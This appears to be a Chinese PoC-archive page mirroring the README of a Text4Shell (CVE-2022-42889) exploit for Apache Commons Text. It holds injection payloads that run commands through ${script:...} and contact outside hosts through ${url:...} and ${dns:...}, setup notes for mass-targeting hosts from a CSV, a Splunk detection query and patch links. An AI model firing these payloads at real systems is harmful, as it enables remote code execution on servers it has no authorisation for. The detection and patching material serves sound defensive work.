目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1336

100%

CVE-2022-42889 PoC — Apache Commons Text 代码注入漏洞

来源
关联漏洞
标题: Apache Commons Text 代码注入漏洞 (CVE-2022-42889)
Description:Apache Commons Text是美国阿帕奇(Apache)基金会的一个专注于字符串算法的库。 Apache Commons Text 1.5至1.9版本存在安全漏洞,该漏洞源于默认的Lookup实例集包括可能导致任意代码执行或与远程服务器联系的插值器,可能容易受到远程代码执行或与远程服务器的无意接触的影响。
Description
Text4Shell PoC Exploit 
介绍
# CVE-2022-42889 PoC
Text4Shell PoC Exploit, with ability to set custom payloads. 

## Payload

```
“${prefix:engine:input}”
Prefix available - “script”, “dns”, “url”
${script:name} ex - ${script:javascript:java.lang.Runtime.getRuntime().exec('whoami')}
${url:name} ex - ${url:UTF-8:https://domain.tld}
${dns:name} ex - ${dns:address|domain.tld}
```

## Intended Use
Usage of this script is limited to personnel who are authorised to run the payload on the target hosts for vulnerability patching purposes only. Prior to running this script, ensure you are authorised.

## Usage

```
git clone https://github.com/west-wind/CVE-2022-42889.git
python poc-cve-2022-42889.py
```

## Getting Started
This POC expects to receive all targets in a CSV file titled --> **allTargets.csv** with one column titled --> **targets**, containing all the targets that need to be scanned ex., http://12.23.45.67:9099 or http://spark.domain.com. The / will be added by the script.

Enter the payload to be executed on the target in the **POC.conf** file. 
Your host in    --> **yourHostHere** http://my_domain_here.com
Your payload in --> **yourPayloadHere** payload.sh

Made for research purposes.

## Detection Splunk Query
```
index=web sourcetype IN (nginx, waf_logs)
| eval actual=urldecode(_raw)
| rex field=actual "(?<payloadIdentified>\$\{(script|dns|url)\:[^\"]*)" max_match=0
| where isnotnull(payloadIdentified)
| table _time src_ip dest payloadIdentified status request url user_agent referrer
```

## Patching & References
[NIST NVD](https://nvd.nist.gov/vuln/detail/CVE-2022-42889)

[Sysdig Blog](https://sysdig.com/blog/cve-2022-42889-text4shell/)
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →